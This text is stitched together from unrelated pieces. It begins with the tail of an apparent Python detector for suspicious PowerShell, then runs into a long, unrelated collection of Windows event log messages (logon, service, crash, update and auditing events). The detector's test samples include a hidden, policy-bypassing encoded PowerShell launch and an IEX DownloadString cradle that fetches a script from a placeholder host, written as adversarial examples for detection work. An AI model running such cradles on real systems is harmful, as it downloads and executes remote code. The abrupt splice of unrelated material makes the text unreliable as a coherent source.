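ScriptBlock ID: 6d90e0bb-e381-4834-8fe2-5e076ad267b3
Path:"""

# Constructed adversarial counterparts; the command line and URL are made up.
SAMPLE_403_SUSPICIOUS = """Details:
NewEngineState=Stopped
PreviousEngineState=Available
HostName=ConsoleHost
HostApplication=powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoACcAaAAnACkA
CommandLine="""

SAMPLE_4104_SUSPICIOUS = """Creating Scriptblock text (1 of 1):
IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')
ScriptBlock ID: 00000000-0000-0000-0000-000000000000
Path:"""

if __name__ == "__main__":
    for name, sample in (("403 benign", SAMPLE_403_BENIGN),
                         ("4104 benign", SAMPLE_4104_BENIGN),
                         ("403 suspicious", SAMPLE_403_SUSPICIOUS),
                         ("4104 suspicious", SAMPLE_4104_SUSPICIOUS)):
        print(f"{name}: {assess(sample) or 'no findings'}")
```

The 4104 check is the one that matters in practice: an encoded or obfuscated HostApplication is only the outer wrapper, whereas script block logging records the de-obfuscated text the engine actually compiled, so the same cradle pattern keeps working when the command line is Base64.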
Source:
Microsoft-Windows-Security-Auditing
Category:
Other Logon/Logoff Events
Message:
A session was disconnected from a Window Station.
Subject:
Account Name: some.user
Account Domain: SOMEDOMAIN
Logon ID: 0x2335b249
Session:
Session Name: RDP-Tcp#0
Additional Information:
Client Name: wksclient04.lo
Client Address: 192.168.1.6
Source:
Microsoft-Windows-Security-Auditing
Category:
Process Termination
Message:
A process has exited.
Subject:
Security ID: MYDOMAIN\some.user
Account Name: some.user
Account Domain: MYDOMAIN
Logon ID: 0x5E006051
Process Information:
Process ID: 0x5ec4
Process Name: C:\Windows\System32\dllhost.exe
Exit Status: 0x0
Message:
SQL Server Scheduled Job 'sqlmail test' (0x1C727E7088AC614399AAD98E792DB21C) - Status: Failed - Invoked on: 2018-02-21 07:25:00 - Message: The job failed. The Job was invoked by Schedule 28 (SQL Mail test). The last step to run was step 1 (1).
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Message:
The virtual storage filter driver is inactive for ide disk at location (2,0,0,0)
Message:
Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: Not enough storage is available to complete this operation.
Source:
Service Control Manager
Message:
The Routing and Remote Access service terminated with the following service-specific error: The callback function must be invoked inline.
Message:
The currently configured accounting provider failed to load and initialize successfully. The connection was prevented because of a policy configured on your RAS/VPN server. Specifically, the authentication method used by the server to verify your username and password may not match the authentication method configured in your connection profile. Please contact the Administrator of the RAS server and notify them of this error.
Source:
Report Server (SSRS)
Message:
Log Name: Application
Source: Report Server (SSRS)
Date: 8/12/2020 5:17:12 PM
Event ID: 108
Task Category: (2)
Level: Error
Keywords: Classic
User: N/A
Computer: MASKED.org
Description:
Report Server (SSRS)
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Report Server (SSRS)" />
<EventID Qualifiers="0">108</EventID>
<Level>2</Level>
<Task>2</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2020-08-12T22:17:12.323342900Z" />
<EventRecordID>59464</EventRecordID>
<Channel>Application</Channel>
<Computer>MASKED.org</Computer>
<Security />
</System>
<EventData>
<Data>Report Server (SSRS)</Data>
<Data>ORACLE</Data>
</EventData>
</Event>
Source:
USB\VID_18D1&PID_4EE7&MI_03\7&16246af8&3&0003
Category:
Microsoft-Windows-Kernel-PnP
Message:
2020-12-25 4:37:06 PM Device USB\VID_18D1&PID_4EE7&MI_03\7&16246af8&3&0003 was configured.
Message:
Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = LT-MULLINTI; User = LT-MULLINTI\mtscadmin; ClientProcessId = 8944; Component = Unknown; Operation = Start IWbemServices::ExecNotificationQuery - ROOT\WMI : SELECT * FROM MSNdis_StatusMediaConnect; ResultCode = 0x80041032; PossibleCause = Unknown
Category:
Executing Pipeline
Message:
Error Message = The parameter is incorrect.
Provider Name = Microsoft.PowerShell.Core\FileSystem
Context:
Severity = Warning
Host Name = InstallShield_PS_Host
Host Version = 1.0.0.0
Host ID = a0925d75-baf4-4609-b69b-8d14a9f85b42
Host Application = C:\Windows\System32\MsiExec.exe -Embedding 99CAFEB8759CB269DF3B8F5AE58B9B8D
Engine Version =
Runspace ID =
Pipeline ID =
Command Name =
Command Type =
Script Name =
Command Path =
Sequence Number = 18
User = DESKTOP-T0MA7N9\pc2
Connected User =
Shell ID = Microsoft.PowerShell
User Data:
Message:
The winlogon notification subscriber <GPClient> was unavailable to handle a notification event.
Category:
Engine Lifecycle
Message:
Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=15
HostName=ConsoleHost
HostVersion=5.1.19041.610
HostId=fc1e08f5-6fa2-4b1f-b078-71504abeb1c1
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
EngineVersion=5.1.19041.610
RunspaceId=2825a70e-71d0-4804-9516-922aee2bdbfe
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="PowerShell" />
<EventID Qualifiers="0">403</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>4</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2021-04-09T00:48:26.1133783Z" />
<EventRecordID>40</EventRecordID>
<Correlation />
<Execution ProcessID="0" ThreadID="0" />
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-BSLE0HC</Computer>
<Security />
</System>
<EventData>
<Data>Stopped</Data>
<Data>Available</Data>
<Data> NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=15
HostName=ConsoleHost
HostVersion=5.1.19041.610
HostId=fc1e08f5-6fa2-4b1f-b078-71504abeb1c1
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
EngineVersion=5.1.19041.610
RunspaceId=2825a70e-71d0-4804-9516-922aee2bdbfe
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
</EventData>
</Event>
Message:
The IO operation at logical block address 0x6ed378 for Disk 0 (PDO name: \Device\00000031) was retried.
Message:
Initialization failed because the driver device could not be created. Use the string "000000000100320000000000D71000C011010000250200C001000000000000000000000000000000" to identify the interface for which initialization failed. It represents the MAC address of the failed interface or the Globally Unique Interface Identifier (GUID) if NetBT was unable to map from GUID to MAC address. If neither the MAC address nor the GUID were available, the string represents a cluster device name.
Source:
Microsoft-Windows-PerfProc
Source:
Service Control Manager
Message:
The Remote Desktop Services service terminated due to an error: The specified file cannot be found.
Source:
Microsoft-Windows-ActiveDirectory_DomainService
Message:
The directory has been configured to not enforce per-attribute authorization during LDAP add operations. Warning events will be logged, but no requests will be blocked. This setting is not secure and should only be used as a temporary troubleshooting step. Please review the suggested mitigations in the link below.
https://go.microsoft.com/fwlink/?linkid=2174032
Source:
OneApp_IGCC_WinService
Source:
Kernel-EventTracing
Message:
Starting the session "Microsoft.Windows.Remediation" failed with the following error: 0xC0000035
Message:
Message: [0301-01:57:16:346][PID:1588][TID:08432][GFDrv][error][_GetAcDcSettingIndex:04098] Goodix>>> ACSettingIndex fail
Source:
Windows Update Agent
Message:
Unable to connect: Windows is unable to connect to the Automatic Updates service and therefore cannot download and install updates according to the set schedule. Windows will continue to try to establish a connection.
Message:
License Activation (slui.exe) failed with the following error code: hr=0x803F7001
Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=UserLogon;SessionId=2
Category:
Engine Lifecycle
Message:
Engine state is changed from Available to Stopped.
Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=15
HostName=ConsoleHost
HostVersion=5.1.22598.1
HostId=46dc6910-488c-4202-a87a-de50e5ed56c4
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
EngineVersion=5.1.22598.1
RunspaceId=c9ce49c6-29b1-4d28-85df-b7c49d562b06
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Message:
Unable to find the certificate with thumbprint 6A80C06C7E33AC535F671B3366355547C35D044B in the current computer or the certificate is missing private key. The certificate is needed to sign the outgoing token.
Message:
Active Manager failed to mount database Public Folder Database 1 on server MailServer1.arabia.sy. Error: An Active Manager operation failed. Error The database action failed. Error: Unable to mount database 'Public Folder Database 1'. The database appears to have been mounted at least once since its creation, but there is no database file at 'D:\Exchange 2010\Mailbox Database\Public Folder Database\Public Folder Database.edb'. Either recover the database file from a backup, or mount the database with a new, empty database by using the Mount-Database cmdlet with the -Force parameter..
Source:
Microsoft Windows security auditing.
Message:
The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4320
Application Name: \device\harddiskvolume2\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 224.0.0.252
Source Port: 5355
Destination Address: 167.196.121.75
Destination Port: 60070
Protocol: 17
Filter Information:
Filter Run-Time ID: 83103
Layer Name: Receive/Accept
Layer Run-Time ID: 44
Source:
Service Control Manager
Message:
A timeout (30000 milliseconds) was reached while waiting for a transaction response from the AudioEndpointBuilder service.
Message:
The local adapter does not support an important Low Energy controller state to support peripheral mode. The minimum required supported state mask is 0x2491f7fffff, got 0x1fffffff. Low Energy peripheral role functionality will not be available.
Message:
The description for Event ID 255 from source Python Service cannot be found. Either the component that raises this event is not installed on your local computer or the installation is corrupted. You can install or repair the component on the local computer.
If the event originated on another computer, the display information had to be saved with the event.
The following information was included with the event:
Exception : (1058, 'StartService', 'The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.')
The message resource is present but the message was not found in the message table
Message:
BeyondInsight ProcessEvent returned the following error: <Return><Status>Error</Status><Details>UNEXPECTED EXCEPTION: There was no endpoint listening at https://[redacted] that could accept the message. This is often caused by an incorrect address or SOAP action. See InnerException, if present, for more details.</Details></Return>.
Source:
kernel-eventtracing
Message:
Session "ETW USB tracing" failed to start with the following error: 0xC0000022
Source:
Microsoft Windows security
Category:
User Account Management
Message:
A user account was created.
Source:
WindowsUpdateClient
Category:
Windows Update Agent
Message:
Windows Update failed to check for updates with error 0x80072EE2
Message:
The update failed; see event log
Source:
WindowsUpdateClient
Category:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80004002: 2022-03 Security Only Quality Update for Windows Server 2008 R2 for x64-based Systems (KB5011529).
Message:
The description for Event ID ( 0 ) in Source ( ThreadLib ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: ThreadLib::Thread Exception::ThumbFetcherThreadFunc.
Message:
StartMenuExperienceHost (6836,P,98) TILEREPOSITORYS-1-5-21-3400871313-2007772415-2983089221-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Access is denied. ". The operation will fail with error -1032 (0xfffffbf8).
Category:
Service Monitoring
Message:
The status for driver wdboot (Windows Defender Boot Driver) remains Stopped.
Additional Driver Information:
Startup type: Automatic
Executable: \SystemRoot\system32\drivers\wd\WdBoot.sys
Source:
DeviceManagement-Enterprise-Diagnostics-Provider
Message:
MDM ConfigurationManager: Command failure status. Configuration Source ID: (LA 7F004E2-A009-41B4-AC78-69BCCA464D09}), Enrollment Type: (FamilySafety), CSP Name: (AppLocker), Command Type: (Clear: first phase of Delete), CSP URI:
(/Vendor/MSFT/AppLocker/FamilySafety/FamilySafetyGroup),Result:(UnknownWin32Error code: 0x86000002).
Message:
Faulting application name: BackgroundTaskHost.exe, version: 10.0.20348.1, time stamp: 0xdf4b0fee
Faulting module name: twinapi.appcore.dll, version: 10.0.20348.1129, time stamp: 0x5b888f7b
Exception code: 0xc0000409
Fault offset: 0x00000000000d222b
Faulting process id: 0x144c
Faulting application start time: 0x01d94a82bf78f269
Faulting application path: C:\Windows\system32\BackgroundTaskHost.exe
Faulting module path: C:\Windows\System32\twinapi.appcore.dll
Report Id: ad3e8927-b13c-4133-97a0-a96e03efd1cc
Faulting package full name: Microsoft.AAD.BrokerPlugin_1000.19580.1000.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App
Message:
BACKUP failed to complete the command BACKUP LOG model. Check the backup application log for detailed messages.
Message:
The driver detected a controller error on \Device\Raidport3.
Message:
The system session has transitioned from 16 to 18.
Reason: 220
Category:
Enregistrement/récupération
Message:
svchost (9916,R,98) TILEREPOSITORYS-1-5-18: L’erreur -1023 (0xfffffc01) s’est produite lors de l’ouverture d’un fichier journal
Message:
The server {021E4F06-9DCC-49AD-88CF-ECC2DA314C8A} did not register with DCOM within the required timeout.
Category:
Audit User Account Management
Message:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4738</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13824</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-20T16:22:02.792454100Z" />
<EventRecordID>175413</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1508" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="Dummy">-</Data>
<Data Name="TargetUserName">ksmith</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6609</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30dc2</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="SamAccountName">-</Data>
<Data Name="DisplayName">-</Data>
<Data Name="UserPrincipalName">-</Data>
<Data Name="HomeDirectory">-</Data>
<Data Name="HomePath">-</Data>
<Data Name="ScriptPath">-</Data>
<Data Name="ProfilePath">-</Data>
<Data Name="UserWorkstations">-</Data>
<Data Name="PasswordLastSet">-</Data>
<Data Name="AccountExpires">-</Data>
<Data Name="PrimaryGroupId">-</Data>
<Data Name="AllowedToDelegateTo">-</Data>
<Data Name="OldUacValue">0x15</Data>
<Data Name="NewUacValue">0x211</Data>
<Data Name="UserAccountControl">%%2050 %%2089</Data>
<Data Name="UserParameters">-</Data>
<Data Name="SidHistory">-</Data>
<Data Name="LogonHours">-</Data>
</EventData>
</Event>
Source:
PowerShell (PowerShell)
Category:
Task Category (6)
Message:
Provider "Function" is Started.
Details:
ProviderName=Function
NewProviderState=Started
SequenceNumber=9
HostName=ConsoleHost
HostVersion=5.1.19041.2673
HostId=1e6d96ab-43f1-4b85-bd39-3cc54faa962d
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command $Res = 0; $Infs = Get-Item -Path ($env:WinDir + '\inf\*.inf'); foreach ($Inf in $Infs) { $Data = Get-Content $Inf.FullName; if ($Data -match '\[defaultinstall.nt(amd64|arm|arm64|x86)\]') { $Res = 1; break; } } Write-Host 'Final result:', $Res;
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Message:
CertFindCertificateInStore failed with: (-2146885628) Cannot find object or property.
Source:
TerminalServices-RemoteConnectionManager
Message:
The RD Session Host server received large number of incomplete connections. The system may be under attack.
Source:
Application Error
Message:
Faulting application name: BackgroundTaskHost.exe, version: 10.0.19041.546, time stamp: 0x1d3a15e7
Faulting module name: ntdll.dll, version: 10.0.19041.3155, time stamp: 0x5212ece5
Exception code: 0xc0000374
Fault offset: 0x00000000000ff419
Faulting process id: 0xafb0
Faulting application start time: 0x01d9c3f947c55a40
Faulting application path: C:\WINDOWS\system32\BackgroundTaskHost.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: 29e16c65-2180-4e57-9cf3-14d887083a9e
Faulting package full name: Microsoft.AAD.BrokerPlugin_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App
Source:
Service Control Manager
Message:
The EuGdiDrv Service was not started due to the following error:
The specified path cannot be found.
Message:
The following fatal alert was received: 40.
Message:
Error code: 0xDC, Sub error code: 0x7C
Message:
DrvSetContext failed functionality indeterminant(pid=2112 cncmd.ext 64bit)
Source:
Service Control Manager
Message:
The following boot-start or system-start driver(s) did not load:
dam
Message:
The computer has rebooted from a bugcheck. The bugcheck was: 0x0000003b (0x0000000080000003, 0xfffff8063333dee3, 0xffff8308449f4dd0, 0x0000000000000000). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: c5f3df43-03aa-46e1-8751-ce9800ff3fa9.
Source:
ModernDeployment-Diagnostics-Provider
Message:
Autopilot.dll WIL error was reported.
HRESULT: 0x80070491
File: onecoreuap\admin\moderndeployment\autopilot\dll\dllmain.cpp, line 128
Message: NULL
Source:
Kernel-EventTracing
Message:
Session "NT Kernel Logger" failed to start with the following error: 0xC0000035
Message:
Error reading log event record. Handle specified is 927269016. Return code from ReadEventLog is 87.
Source:
CertificateServicesClient-CertEnroll
Message:
Certificate enrollment for Local system failed in authentication to policy servers with ID {########-####-####-####-72067EF2E6D9} (The user name or password is incorrect. 0x8007052e (WIN32: 1326 ERROR_LOGON_FAILURE))
Source:
Microsoft Windows security auditing
Message:
LogName=Security
EventCode=4725
EventType=0
ComputerName=domain.domain.local
SourceName=Microsoft Windows security auditing.
Type=Information
RecordNumber=2311231312
Keywords=Audit Success
TaskCategory=User Account Management
OpCode=Info
Message=A user account was disabled.
Subject:
Security ID: S-1-5-21-5232424-4342331231-1232132131-1605
Account Name: doamin
Account Domain: local
Logon ID: 0x1dasdwD
Target Account:
Security ID: S-1-5-21-5232424-4342331231-1232132131-1605
Account Name: ws-APP$
Account Domain: local
Source:
Application Error
Message:
Faulting application name: SweetAffection.exe, version: 0.0.0.0, time stamp: 0x6172bb09
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x698c
Faulting application start time: 0x01dac90f4dd836ea
Faulting application path: D:\ganestarts\SweetAffection-0.10.7-pc\SweetAffection.exe
Faulting module path: unknown
Report Id: 44bc9f5f-6f32-47ef-a0e3-4450382e76dd
Faulting package full name:
Message:
Error ID 1 happened in Windows Search recovery stage, please restart the service. If this error persists, please recreate the index.
Context: Application, SystemIndex Catalog
Details:
0x%08x (0x80040d23 - The gatherer is shutting down. (HRESULT : 0x80040d23))
Message:
The TCP/IP NetBIOS Helper service was successfully sent a stop control.
The reason specified was: 0x40030011 [Operating System: Network Connectivity (Planned)]
Comment: None
Source:
Application Error
Message:
Faulting application name: wuauclt.exe, version: 10.0.17763.3532, time stamp: 0x169653c2
Faulting module name: combase.dll, version: 10.0.17763.5576, time stamp: 0xe64b4fc6
Exception code: 0xc0000005
Fault offset: 0x00000000000588b8
Faulting process id: 0x7c8
Faulting application start time: 0x01db3b3a65732008
Faulting application path: C:\Windows\system32\wuauclt.exe
Faulting module path: C:\Windows\System32\combase.dll
Report Id: 822e0180-614d-4eb0-94c6-0dd5ca2335ac
Faulting package full name:
Faulting package-relative application ID:
Message:
Generate Activation Context failed for F:\Internet Downloads\McAfee VirusScan CLI Scanner\cls-w32-702-l\scan.exe.Manifest. Reference error message: The operation completed successfully.
.
Source:
Microsoft-Windows-Directory-Services-SAM
Message:
There is no message in the SIEM logs I'm seeing. Fields unique to this Event ID (Kibana Discover):
winlog.event_data.AccountDN
winlog.event_data.AccountSID
winlog.event_data.KeyHash